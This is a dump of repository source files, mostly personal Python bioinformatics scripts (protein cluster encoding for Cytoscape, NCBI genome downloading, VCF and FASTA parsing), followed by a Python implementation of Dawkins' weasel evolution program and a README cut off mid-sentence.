colorTable}\n\nif __name__ == '__main__':\n \n directory = '/home/javi/workspace/popnetd3-front'\n filename = 'data.json'\n outpath = '/'.join([directory, filename])\n \n data = genData(10)\n \n import json\n \n with open(outpath, 'w') as output:\n json.dump(data, output)"
},
{
"alpha_fraction": 0.5338569283485413,
"alphanum_fraction": 0.5504139065742493,
"avg_line_length": 31.26712417602539,
"blob_id": "52cd313c40394699e9c4963e6614d69eff65a77b",
"content_id": "dd47c2bf1e3d3bfa9f629161c00aefb620144ecb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4711,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 146,
"path": "/Proteins/SRSCytoscape.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 19, 2014\n\n@author: javi\n'''\n'''Similar to cytoscape encoder, this file encodes the results of the SRS protein searches into\ncytoscape format for ease of viewing'''\nimport os\nimport re \n\n'''String -> list\nloads clusters into 2D list'''\ndef loadClusters(filepath):\n with open(filepath) as input:\n data = input.read()\n results = []\n \n lines = re.split(\"\\n\", data)[:-1]\n for line in lines:\n elements = line.split(\" \")[1:]\n fixedelements = [re.split(\"[|]\", element)[1] for element in elements]\n results.append(fixedelements)\n return results\n \n\n\n'''String -> String\ngets the color for that family, for the purpose of the node chart.'''\ndef getColor(family):\n familyDict = {'fam_1':'pink', 'fam_2':'red','fam_3':'orange','fam_4':'yellow','fam_5':'green','fam_6':'cyan','fam_7':'purple','fam_8':'brown', 'degen':'black'}\n return familyDict[family]\n\n\n'''2D list -> 1D dictionary\ngets all the nodes in the clusters, numbers them, and make\nsearchable by dictionary'''\ndef getNodes(clusters):\n count = 0\n nodes = {}\n for line in clusters:\n for item in line:\n nodes[item] = count\n count += 1\n return nodes\n\n\n'''2D list, dictionary -> list\ngets all the edges representing the clusters'''\ndef getEdges(clusters, nodes):\n edges = []\n for line in clusters:\n for index, e1 in enumerate(line):\n for e2 in line[index:]:\n edges.append((nodes[e1],nodes[e2]))\n return edges\n\n'''String -> dictionary\ngets the domain info for each node from the\nhmmr files.''' \ndef getNodeDomains(hmmrDirectory):\n files = [ x for x in os.listdir(hmmrDirectory) if os.path.isfile(\"/\".join([hmmrDirectory,x]))]\n nodes = {}\n for file in files:\n with open(\"/\".join([hmmrDirectory, file])) as input:\n data = input.read()\n proteins = re.findall(\"(?s)>>(.+?)\\s+(.+?)\\n(.+?)(?=\\n>>|$)\", data)\n for protein in proteins:\n strain = re.match(\"(.+?)_.*\", protein[0]).group(1)\n name = protein[1]\n srs = re.search(\"SRS.*$\", name)\n if srs:\n name = srs.group(0)\n name = \"{0}_{1}\".format(strain, name)\n \n domains = re.findall(\"Family\\s+(.+?)\\s\", protein[2])\n degens = re.findall(\"Degen\\s+(.+?)\\s\", protein[2])\n \n fixedDomains = []\n for domain, degen in zip(domains, degens):\n if degen=='True':\n fixedDomains.append(\"degen\")\n elif degen=='False':\n fixedDomains.append(domain)\n else:\n raise Exception(\"bad degen value\")\n \n nodes[protein[0]] = (name, fixedDomains)\n return nodes\n\n# '''dict (nodes) -> dict\n# aligns the domains to easily spot differences.'''\n# def alignDomains(nodes):\n# \n\n\n\ndef encode(clusters, hmmrDirectory, name):\n print(name + \" is being encoded\")\n #nodes are two-tuples consisting of id and label\n nodes = getNodes(clusters)\n edges = getEdges(clusters, nodes)\n nodeComp = getNodeDomains(hmmrDirectory)\n \n #prep the texts\n nodeTexts = [getNodeText(index, nodeComp[node]) for node, index in sorted(nodes.items(), key=lambda x: x[1])]\n edgeTexts = [getEdgeText(edge) for edge in sorted(edges)]\n \n print(\"{0} nodes and {1} edges. 
Writing...\".format(len(nodeTexts), len(edgeTexts)))\n \n text = \"\\\n<?xml version=\\\"1.0\\\"?>\\n\\\n <graph label=\\\"{0}\\\"\\n\\\n xmlns:dc=\\\"http://purl.org/dc/elements/1.1/\\\"\\n\\\n xmlns:xlink=\\\"http://www.w3.org/1999/xlink\\\"\\n\\\n xmlns:rdf=\\\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\\\"\\n\\\n xmlns:cy=\\\"http://www.cytoscape.org\\\"\\n\\\n xmlns=\\\"http://www.cs.rpi.edu/XGMML\\\"\\n\\\n directed=\\\"0\\\" >\\n\\\n{1}\\n\\\n{2}\\n\\\n </graph>\".format(name, \"\\n\".join(nodeTexts), \"\\n\".join(edgeTexts))\n return text\n\n\ndef getNodeText(index, infoTuple):\n text = \"\\\n <node label=\\\"{1}\\\" id=\\\"{0}\\\" >\\n\\\n <att name=\\\"name\\\" type=\\\"string\\\" value=\\\"{1}\\\"/>\\n\\\n <att name=\\\"Gradient\\\" type=\\\"string\\\" value=\\\"stripechart: colorlist="{2}"\\\"/>\\n\\\n <graphics h=\\\"10\\\" w=\\\"10\\\"/>\\n\\\n </node>\\n\".format(index, infoTuple[0], \",\".join([getColor(x) for x in infoTuple[1]]))\n return text\n\n\n'''(String, String, int) -> String\nsame.'''\ndef getEdgeText(edge):\n \n if edge[0] == edge[1]:\n return \"\"\n \n text = \"\\\n <edge source=\\\"{0}\\\" target=\\\"{1}\\\" >\\n\\\n <graphics width=\\\"1\\\"/>\\n\\\n </edge>\\n\".format(edge[0], edge[1])\n return text\n"
},
{
"alpha_fraction": 0.5068807601928711,
"alphanum_fraction": 0.5198776721954346,
"avg_line_length": 23.148147583007812,
"blob_id": "eee316521a3cab7b27f2470efa80fb34a98378cc",
"content_id": "c05b599357199f25c6abafb6800c07b764e7c0ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1308,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 54,
"path": "/misc/NCBIDownloader.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Mar 15, 2017\n\nDownloads some genomes from ncbi using a .csv table file\n\n@author: javi\n'''\nimport re \nfrom subprocess import call\nfrom os import chdir\n\ndef parseCSV(path):\n \n with open(path, 'r') as input:\n data = input.read()\n \n entries = []\n \n for line in re.split('\\n', data):\n if line == '': \n continue\n \n entries.append([re.sub(r'^\"|\"$', '', s) for s in re.split(',', line)]) #strips quotes\n \n legend = entries.pop(0)\n \n return legend, entries\n\n\ndef download(info):\n #downloads files gives a parsed table of info\n name_index = 1\n url_index = -2\n alt_url_index = -1\n\n \n for entry in info:\n if not entry[url_index] == '-':\n call(['wget', '-r', '-nH', '--cut-dirs=6', entry[url_index]])\n f_name = re.split('/', entry[url_index])[-1]\n else:\n call(['wget', '-r', '-nH', '--cut-dirs=6', entry[alt_url_index]])\n f_name = re.split('/', entry[alt_url_index])[-1]\n \n call(['mv', f_name, re.sub(' |/', '', entry[name_index])])\n \nif __name__ == '__main__':\n \n directory = '/data/new/javi/neis/ngo2'\n table = 'ngo_list2.csv'\n \n chdir(directory)\n info = parseCSV('/'.join([directory, table]))\n download(info[1])\n "
},
{
"alpha_fraction": 0.6971935033798218,
"alphanum_fraction": 0.7045789957046509,
"avg_line_length": 19.454545974731445,
"blob_id": "33a78498af57b08687742b0480c2876a8b880d15",
"content_id": "2e7dcfc98a7379fb9272d5fe75475b7a360c64a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 677,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 33,
"path": "/BamSorter/BamSorter.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Oct 3, 2013\n\n@author: javi\n'''\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport re\n\n\n\n\nif __name__ == '__main__':\n \n#init variables\n folder=\"\"\n\n#load all bam files. probably use bamtools to parse them into txt files. \n\n#set one of them as the \"lead\". The first one will do. \n\n#define a regex to represent a \"block\". in bam files this is just one tab delimited line. \n\n#read the reference location and start site in the lead block, then search for that block in the other files.\n\n#grab the results and write them into one file. \n\n#do this until the end of file is reached. \n\n\n#new function? call indels for each group of blocks. \n\n"
},
{
"alpha_fraction": 0.5635528564453125,
"alphanum_fraction": 0.5742725729942322,
"avg_line_length": 22.35714340209961,
"blob_id": "027be8f105fe8a6d24cf8da95cd78535ec72e821",
"content_id": "2e6449207fae65d2717756c2d46ae6f45f0bb94c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 653,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 28,
"path": "/misc/miottoReader.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jan. 3, 2019\n\n@author: Javi\n'''\nimport re\nimport pandas\n\ndef read(path):\n \n line_template = '(?<!Burkina)(?<!Cambodia)(?<!,)\\s(?!$)' \n df = pandas.read_csv(path, sep=line_template, names=['num', 'accession', 'origin', 'code'], skiprows = 1)\n \n print(df.iloc[3])\n \n \n #take off end whitespace and fix columns\n df['code'] = df['code'].map(lambda x: str(x).strip())\n return df\n\n \nif __name__ == '__main__':\n \n path = '/d/data/plasmo/additional_data/raw_accs.txt'\n output_path = '/d/data/plasmo/additional_data/sec_accs.txt'\n \n df = read(path)\n df.to_csv(output_path, sep='\\t', index=False)"
},
{
"alpha_fraction": 0.45804598927497864,
"alphanum_fraction": 0.4985632300376892,
"avg_line_length": 27.52458953857422,
"blob_id": "2bbc52d98eb18624a65b74e575cb1e6304c171b2",
"content_id": "229d25afac35e03c7806c714f225b4b41a5dcf33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3480,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 122,
"path": "/misc/TableChanger.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 28, 2016\n@author: javi\n'''\nimport re\n\n'''\nTakes path\nReturns (header, body) as separated lines\nNo further modifications\n'''\n\ndef readTable(filepath):\n with open(filepath, 'r') as input:\n raw_text = input.read()\n \n line_split = re.split('\\n', raw_text)\n header = line_split[0]\n body = line_split[1:-1]\n \n return header, body\n \n'''\nrequires the table tuple (header, body) from readTable\nreturns the modified tuple in the same format\n'''\ndef reverseOrder(table): \n header, body = table\n \n grad_pattern = '(?<=colorlist=\\\"\\\")(.+?)(?=\\\")'\n val_pattern = '(?<=\\\")([0-9\\.]+?[|].+?)(?=\\\")'\n results = []\n \n for line in body:\n grad = re.search(grad_pattern, line).group(1)\n vals = re.search(val_pattern, line).group(1)\n grad_list = re.split(',', grad)\n val_list = re.split('\\|', vals)\n \n grad_list.reverse()\n val_list.reverse()\n \n new_grad = ','.join(grad_list)\n new_val = '|'.join(val_list)\n \n #sub the old strings with the new ones.\n mod_line = re.sub(grad_pattern, new_grad, line)\n mod_line2 = re.sub(val_pattern, new_val, mod_line)\n \n results.append(mod_line2)\n \n return (header, results)\n\ndef changeColor(input_path, color_dict):\n \n def colrep(matchobj):\n return color_dict[matchobj.group(0)]\n \n with open(input_path, 'r') as input:\n data = input.read()\n \n for color in color_dict:\n data = re.sub(color, colrep, data)\n \n return data\n \n##helpers\n\n\nif __name__ == '__main__':\n\n# ## To Reverse Order\n# directory = '/data/new/javi/reshape'\n# file_name = 'plasmo_partial.csv'\n# output_name = 'rev_plasmo_partial.csv'\n# \n# directory = '/data/new/javi/toxo/SNPSort80/matrix/cytoscape'\n# file_name = 'new_table.csv'\n# output_name = 'new_table2.csv'\n# \n# path = '/'.join([directory, file_name])\n# output_path = '/'.join([directory, output_name])\n# \n# with open(output_path, 'w') as output:\n# header, body = reverseOrder(readTable(path))\n# output.write('\\n'.join([header] + body))\n \n ## To change color\n directory = '/d/data'\n file_name = 'type2nodes_2.csv'\n output_name = 'type2nodes_3.csv'\n \n path = '/'.join([directory, file_name])\n output_path = '/'.join([directory, output_name])\n \n# color_dict = {'#AA3F00' : '#E31A1C', #blue\n# '#AAFE55' : '#FDBF6F', #red\n# '#FED455' : '#FF7F00', #green\n# '#006AAA' : '#CAB2D6', #orange\n# '#00AA6A' : '#A6CEE3',\n# '#AA003F' : '#1F78B4',\n# '#15AA00' : '#B2DF8A',\n# '#9400AA' : '#33A02C',\n# '#94AA00' : '#FB9A99',}\n \n# color_dict = {'#E31A1C' : '#E41A1C', #blue\n# '#FDBF6F' : '#377EB8', #red\n# '#FF7F00' : '#4DAF4A', #green\n# '#CAB2D6' : '#984EA3', #orange\n# '#A6CEE3' : '#FF7F00',\n# '#1F78B4' : '#FFFF33',\n# '#B2DF8A' : '#A65628',\n# '#33A02C' : '#F781BF',\n# '#FB9A99' : '#00FFF3',}\n \n color_dict = {'#FF00BF' : '#FF9933',\n '#00FEFF' : '#FF0000'}\n \n with open(output_path, 'w') as output:\n output.write(changeColor(path, color_dict))\n \n print('Table changed.')\n"
},
{
"alpha_fraction": 0.5180920958518982,
"alphanum_fraction": 0.5290570259094238,
"avg_line_length": 31.630630493164062,
"blob_id": "08daf323340925278e837db045cc8482193a5e4b",
"content_id": "3be84145488d96422963b76e72f9f8b5ca4d31fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3648,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 111,
"path": "/Proteins/Chartmaker.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jul 20, 2014\n\n@author: Javi\n'''\nimport re\n'''makes some charts based on the clusters. borrows the loadclusters method from\nSRSCytoscape. really should extract that.'''\n\n'''(list, 2D list) -> matrix\nmakes a chart that describes which SRS is present in which strain'''\ndef distributionChart(translatedMatrix, strainList):\n resultMatrix = []\n clusters = translatedMatrix\n iterated = []\n \n \n for cluster in clusters:\n #presort into both separate names\n separated = {}\n for element in cluster:\n if element[1] in separated:\n separated[element[1]].append(element[0])\n else:\n separated[element[1]] = [element[0]]\n \n for name, strains in separated.items(): \n results = {}\n\n for strain in strainList:\n results[strain] = 0\n\n for strain in strains:\n results[strain] += 1\n \n resultMatrix.append((name, results))\n #add the .1 and stuff\n sortedResults = sorted(resultMatrix, key=lambda x: x[0])\n return (sortedResults, strainList)\n \n''' returns the matrix (with IDs turned into tuples) and the strain list\nmake a 2D matrix of tuples, stating the strain and the SRS name'''\ndef translateMatrix(data, composition):\n strainList = []\n translatedMatrix = []\n \n for cluster in data:\n current = []\n \n for element in cluster:\n \n nameSplit = re.split(\"_\", composition[element][0])\n strain = nameSplit[0]\n name = nameSplit[1]\n if strain not in strainList:\n strainList.append(strain)\n current.append((strain, name))\n translatedMatrix.append(current)\n \n return (translatedMatrix, strainList)\n\ndef printDistributionChart(matrix, strainList, outfile):\n strainList.insert(0,\"\")\n with open(outfile, \"w\") as output:\n previous = \"\"\n count = 0\n output.write(\",\".join(sorted(strainList)) + \"\\n\")\n for item in matrix:\n header = item[0]\n if header == previous:\n header += \".{0}\".format(str(count+1))\n count += 1\n else:\n previous = item[0]\n count = 0\n \n body = header\n for entry in sorted(item[1].items(), key=lambda x: x[0]):\n body+=\",{0}\".format(str(entry[1]))\n output.write(body + \"\\n\")\n \ndef domainStats(composition):\n results = {}\n for ID, item in composition.items():\n strain = re.split(\"_\", ID)[0]\n domains = item[1]\n if strain not in results:\n results[strain] = {}\n for domain in domains:\n if domain not in results[strain]:\n results[strain][domain] = 0\n results[strain][domain] += 1\n return results\n\ndef printDomainStats(data, outfile):\n with open(outfile, \"w\") as output:\n famList=[\"fam_{0}\".format(str(x)) for x in range(1, 9)]\n header=\",\" + \",\".join(famList) + \",Total\\n\"\n output.write(header + \"\\n\")\n \n for strain, domainInfo in sorted(data.items()):\n output.write(strain + \",\")\n info = []\n for fam in sorted(famList):\n if fam in domainInfo:\n info.append(str(domainInfo[fam]))\n else:\n info.append(str(0))\n total = sum([int(x) for x in info])\n info.append(str(total))\n output.write(\",\".join(info) + \"\\n\")\n \n \n "
},
{
"alpha_fraction": 0.5343314409255981,
"alphanum_fraction": 0.545172929763794,
"avg_line_length": 22.634145736694336,
"blob_id": "06180a9e16bb9b61cb8a1effaa38de8c6f454950",
"content_id": "0bd78a96d6807caf183310cdf009b4adbf810e6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1937,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 82,
"path": "/misc/TextParser.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on May 26, 2017\n\n@author: javi\n\nParses a text file containing lines of text into a popnet-readable thing\n\nwas for the birthday card network\n'''\n\nimport re\n\ndef read(path):\n with open(path, 'r') as input:\n data = input.read()\n \n \n pattern = '@(.+?)\\n(.+?)$'\n entries = re.split('\\n\\n', data)[:-1]\n \n result = {}\n total = set() #all words\n \n for entry in entries:\n match = re.match(pattern, entry)\n name = match.group(1)\n text = match.group(2)\n words = toWords(text)\n result[name] = words\n total.update(words)\n \n return result, total\n\ndef toWords(string):\n \n string = re.sub('[^a-zA-Z0-9 ]', '', string)\n words = set(re.split('\\s', string))\n return words\n \ndef makeTable(result, total, path, legpath):\n \n def translate(word, name):\n if word in result[name]: return 'T'\n else: return '-'\n \n strings = []\n legstrings = []\n dist = 10000\n chrname = 'STREP_CHRI'\n \n names = sorted(result.keys())\n strings.append('\\t'.join(['', ''] + names))\n \n index = 0\n for word in sorted(total):\n tmp = [translate(word, x) for x in names]\n if tmp.count('T') <= 1: continue\n tmp.insert(0, str(index * dist))\n tmp.insert(0, chrname)\n strings.append('\\t'.join(tmp))\n legstrings.append('\\t'.join([str(index * dist), word]))\n index += 1\n \n with open(path, 'w') as output:\n output.write('\\n'.join(strings))\n \n with open(legpath, 'w') as output:\n output.write('\\n'.join(legstrings))\n\nif __name__ == '__main__':\n \n dir = '/home/javi/Desktop/bt'\n file = 'input.txt'\n output = 'output.txt'\n legend = 'legend.txt'\n \n inpath = '/'.join([dir, file])\n outpath = '/'.join([dir, output])\n legpath = '/'.join([dir, legend])\n \n result, total = read(inpath)\n makeTable(result, total, outpath, legpath)"
},
{
"alpha_fraction": 0.6204460859298706,
"alphanum_fraction": 0.629368007183075,
"avg_line_length": 33.93506622314453,
"blob_id": "910ea6450750533f31e56dd928bdf87e15509b5a",
"content_id": "ce2c8a73ff80941dfadd57511abf65d77322187a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2690,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 77,
"path": "/VCFreader/VCFReader.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Oct 4, 2013\n@author: javi\n'''\nimport os\nimport sys\nfrom os import listdir\nfrom os.path import isfile, join\nimport re\n\n''' \nRegarding the Regexs: \n1. Flags: Multiline, Dotall\n#(?:\\w+?\\t){9} skips all the ##INFO stuff, and finds the line with the column headers.\n then grabs all the headers except the first 9 (which are predefined)\n \n((?:\\w+?\\t)+\\w+?) after skipping the first 9, this part grabs all the remaining headers (sample names) as group(1)\n\n\\n(.*) Skips the newline character, and grabs the remainder of the document (the reads) as group(2)\n\n2. Flags: None\nSeparates out each sample name (from the whole line) and puts them into an array.\n\n3. Separates out each read and put into array\n\nThis serves to help with mapping each number to the sample. But I wonder if we even need to.. \n\n'''\n\ndef analyzeVCF(data):\n separatedata = re.search(\"(?ms)#(?:\\w+?\\t){9}((?:\\w+?\\t)+\\w+?)\\n(.*)\", data)\n if separatedata:\n samplelist = re.findall(\"\\w+?(?=(?:\\t|$))\", separatedata.group(1))\n readlist = re.split(\"\\n\", separatedata.group(2))\n\n \n pass \n\n\nif __name__ == '__main__':\n\n#Load the VCF file.\n path = \"\"\n directory=\"\"\n filename=\"\"\n pathfrag = re.match(\"(.*)/(.*?)\\.(.*)$\")\n try:\n if pathfrag == True and (pathfrag.group(3) == \"vcf\" or pathfrag.group(3) == \"bcf\"):\n directory = pathfrag.group(1)\n filename = pathfrag.group(2)\n os.chdir(directory)\n os.mkdir(\"%s/analyzed\" % directory)\n#Loads the entire file to memory, then passes it to the analyzeVCF function to do the work. \n#analyzeVCF should return a single string to be written to the output file at directory/analyzed/filename.txt\n data = open(\"filename\",\"r\").read()\n open(\"analyzed/%s.txt\",\"w\").write(analyzeVCF(data)) \n else\n print \"%s is not a valid file\" % path\n sys.exit()\n except IndexError:\n print \"%s is not a valid file path\" % path\n sys.exit()\n \n\n\n#Set Chromosome Track (scaffolds too I guess). You'll also need to set the map for the samples. \n\n#Set read head, increment by 500 each time.\n\n#Because the VCF should be sorted by chromosome number, just read by line. Each line will either count for this group or the next one. \n\n#For each group, you'll need to store all the type information from the genotype column of the VCF file. This will probably be in the form of an array. \n\n#You'll need a map to link the information to filename, as they would not be in the same line. The order is the same though.. \n\n\nseparatedata = re.search(\"(?m)#(?:\\w+?\\t){9}((?:\\w+?\\t)+\\w+?)\\n((?:.*\\n)+)\", data)\n"
},
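The docstring in `VCFReader.py` above describes its three regexes in prose; the sketch below runs them on a made-up two-sample VCF fragment (the data is fabricated purely for demonstration):

```python
# Sketch of the three regexes explained in VCFReader.py's docstring,
# applied to an invented two-sample VCF fragment.
import re

data = ("#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\tS1\tS2\n"
        "1\t100\trs1\tA\tG\t50\tPASS\tDP=10\tGT\t0/1\t1/1")

m = re.search(r"(?ms)#(?:\w+?\t){9}((?:\w+?\t)+\w+?)\n(.*)", data)
samples = re.findall(r"\w+?(?=(?:\t|$))", m.group(1))  # regex 2: sample names
reads = re.split(r"\n", m.group(2))                    # regex 3: read lines
print(samples)  # ['S1', 'S2']
print(reads)    # ['1\t100\trs1\tA\tG\t50\tPASS\tDP=10\tGT\t0/1\t1/1']
```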
{
"alpha_fraction": 0.5220851302146912,
"alphanum_fraction": 0.5360127091407776,
"avg_line_length": 23.598039627075195,
"blob_id": "8ca3df2a38088409864d78f9c46ac51784de388d",
"content_id": "60c1c5800b648a36c2a97450195ae11acf7b6fe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2513,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 102,
"path": "/misc/FasAnalyzer.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on May 16, 2017\n\n@author: javi\n\n\nAnalyzes the content of multi sequence fastas to see what's in there.\n'''\n\nimport re\n\n\ndef read(path):\n \n with open(path, 'r') as input:\n data = input.read()\n \n pattern = '(?ms)^>(.+?)\\n'\n headers = re.findall(pattern, data)\n\n return headers\n\ndef findGenes(headers):\n '''\n finds how many genes are referred to in the file given all the headers\n '''\n \n pattern = '(?s)^.+?\\+ (.+?)$'\n genes = set()\n \n for line in headers:\n gene = re.search(pattern, line).group(1)\n if gene not in genes:\n genes.add(gene)\n \n return genes\n\ndef findCoreGenes(genes, path):\n \n with open(path, 'r') as input:\n data = input.read()\n \n core_genes = set()\n \n for ind, gene in enumerate(genes):\n print('Core genes: {0} processed out of {1}'.format(ind, len(genes)), end=\"\\r\")\n pattern = '(?s){}\\n(.+?)\\n'\n seqs = re.findall(pattern, data)\n for seq in seqs:\n if re.search('[^-]', seq):\n core_genes.add(gene)\n break\n \n return core_genes\n\ndef findAccGenes(path):\n \n with open(path, 'r') as input:\n data = input.read()\n \n blocks = re.split('\\>', data)[1:]\n acc_genes = set()\n \n for ind, block in enumerate(blocks):\n print('Acc genes: {0} blocks processed out of {1}'.format(ind, len(blocks)), end=\"\\r\")\n pattern = '(?ms).+?[+] (.+?)\\n(.+?)\\n$'\n match = re.search(pattern, block)\n gene = match.group(1)\n body = match.group(2)\n \n if gene not in acc_genes and not re.search('[^=-]', body):\n\n# print(body)\n# print(gene)\n# print()\n acc_genes.add(gene)\n print()\n return acc_genes\n \nif __name__ == '__main__':\n \n dir = '/data/new/javi/neis/job'\n file = 'BIGSdb_166607_1494887514_31621.xmfa'\n# file = 'cgMLST_aligned.xmfa'\n \n path = '/'.join([dir, file])\n headers = read(path)\n print('finding genes...')\n genes = findGenes(headers)\n# print('finding core genes...')\n# core_genes = findCoreGenes(genes, path)\n# acc_genes = findAccGenes(path)\n# print(len(genes) - len(acc_genes))\n# print(len(acc_genes))\n# core_genes = genes.difference(acc_genes)\n print(len(genes))\n# print(len(list(filter(lambda x: x.startswith('NEIS'), genes))))\n# print(len(core_genes))\n \n \n# from pprint import pprint\n# pprint(sorted(genes))\n "
},
{
"alpha_fraction": 0.4566037654876709,
"alphanum_fraction": 0.505660355091095,
"avg_line_length": 11.090909004211426,
"blob_id": "64b76d5f11756a75ea14cf2de7da4df85c3919fa",
"content_id": "e993b3263c02bf3b3267196f33e1ff2db763fef7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 265,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 22,
"path": "/misc/test.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on May 19, 2017\n\n@author: javi\n'''\nimport math\nimport logging\n\ndef main():\n a = range(1000)\n c = 0\n for i in a:\n c += 1\n \n d = [i + 1 for i in a]\n\n return\n\n\nif __name__ == '__main__':\n import cProfile\n cProfile.run(main())"
}
] | 34 |
livz/WeaselProgram
|
https://github.com/livz/WeaselProgram
|
55c1ceacdea774448de84430e9972018248c2547
|
81a9bc654a609a6d82fa1c994878d716439653c3
|
b6f685b5e16afb0703bafae76a8720b55532454c
|
refs/heads/master
| 2021-01-21T05:29:39.602027 | 2017-02-26T09:52:57 | 2017-02-26T09:52:57 | 83,198,067 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5663225054740906,
"alphanum_fraction": 0.5822080969810486,
"avg_line_length": 27.613636016845703,
"blob_id": "a71282fb4bf28cfe6f1a640543b797fd63a9fd36",
"content_id": "245737818985efffe7ee71c6610d909fb25da8e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2518,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 88,
"path": "/weasel.py",
"repo_name": "livz/WeaselProgram",
"src_encoding": "UTF-8",
"text": "import string\nimport random\nimport itertools\n\n# Possible genes (whole character set)\ncharset = string.ascii_uppercase + \"_\"\n\n# Number of genes (characters in the string)\nnumGenes = 28\n\n# Create a next generation of mutated offspring \ndef mutate(state, numOffspring, mutationProb):\n mutations = []\n\n for i in range(numOffspring):\n mutation = \"\"\n for j in range(numGenes):\n # Will character j be mutated?\n p = random.randint(1, 100)\n if p<=mutationProb:\n # (Possible) Nasty bug no 1: charset NOT state (generations won't variate)\n newGene = charset[random.randint(0, len(charset)-1)] \n mutation += newGene\n else:\n mutation += state[j] \n mutations.append(mutation)\n \n return mutations\n\n# Compute Hamming distance between two strings\ndef hamming(str1, str2):\n return sum(itertools.imap(str.__ne__, str1, str2))\n\n\n# Select the fittest offspring from the pool\n# (Live free or die - UNIX)\ndef fittest(mutations, target):\n min = numGenes+1\n fittest = None\n\n for m in mutations:\n d = hamming(m, target)\n if d<min:\n min = d\n fittest = m \n\n # (Possible) Nasty bug no 2: return fittest NOT m (generations won't evolve at all)) \n return fittest \n\n# Colourise mutation based on distance from target\n# (We don't care about performance so light the Christmas tree)\ndef colorise(mutation, target):\n W = '\\033[0m' # white (normal)\n R = '\\033[31m' # red\n G = '\\033[32m' # green\n \n s = \"\"\n for i in range(len(mutation)):\n if mutation[i] == target[i]:\n s += G + mutation[i]\n else:\n s += R + mutation[i]\n s += W \n return s\n\n# While target not reached, evolve!\ndef evolve(numOffspring, mutationProb):\n cur = \"\".join(random.choice(charset) for _ in range(numGenes))\n fin = \"METHINKS_IT_IS_LIKE_A_WEASEL\"\n \n gen = 0\n \n print \"%4s %28s %4s\" % (\"Gen\", \"Mutation\", \"Dist\") \n while cur != fin:\n offspring = mutate(cur, numOffspring, mutationProb)\n cur = fittest(offspring, fin)\n gen += 1\n print \"%4d\" % gen, colorise(cur, fin), hamming(cur, fin)\n\n\nif __name__ == \"__main__\":\n # Number of offspring per generation\n numOffspring = 100\n\n # Probability that a gene (character) will mutate (percent)\n mutationProb = 5 \n\n evolve(numOffspring, mutationProb)\n"
},
{
"alpha_fraction": 0.718796968460083,
"alphanum_fraction": 0.7248120307922363,
"avg_line_length": 59.39393997192383,
"blob_id": "52727adcba713e97e2a9f2682c50717c017c8e35",
"content_id": "56bf8fe153d1ece2c067f11df5a9f47ac1e824ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2003,
"license_type": "no_license",
"max_line_length": 312,
"num_lines": 33,
"path": "/README.md",
"repo_name": "livz/WeaselProgram",
"src_encoding": "UTF-8",
"text": "# Evolution Weasel Program\n\n```\nHAMLET: Do you see yonder cloud that’s almost in shape of a camel?\nPOLONIUS: By th' mass, and ’tis like a camel indeed.\nHAMLET: Methinks it is like a weasel.\nPOLONIUS: It is backed like a weasel.\nHAMLET: Or like a whale.\nPOLONIUS: Very like a whale.\n```\n\n\n> The weasel program, Dawkins' weasel, or the Dawkins weasel is a thought experiment and a variety of computer simulations illustrating it. Their aim is to demonstrate that the process that drives evolutionary systems—random variation combined with non-random cumulative selection—is different from pure chance. \nThe thought experiment was formulated by Richard Dawkins, and the first simulation written by him; various other implementations of the program have been written by others.\n \nThe [\"Weasel\" algorithm](https://en.wikipedia.org/wiki/Weasel_program) implemented here runs as follows:\n\n1. **Start** - A random state (a string of 28 characters).\n2. **Produce offspring** - Make N copies of the string.\n3. **Mutate** - For each character in each of the copies, with a probability of P, replace the character with a new random character.\n4. Compare each new string with the target string \"METHINKS IT IS LIKE A WEASEL\", and give each a score\n * The number of offspring **N** and the probability **P** are configurable (default values: **N=100** and **P=5%**)\n * The algorithm used for scoring is [Hamming distance](https://en.wikipedia.org/wiki/Hamming_distance)\n * *In real 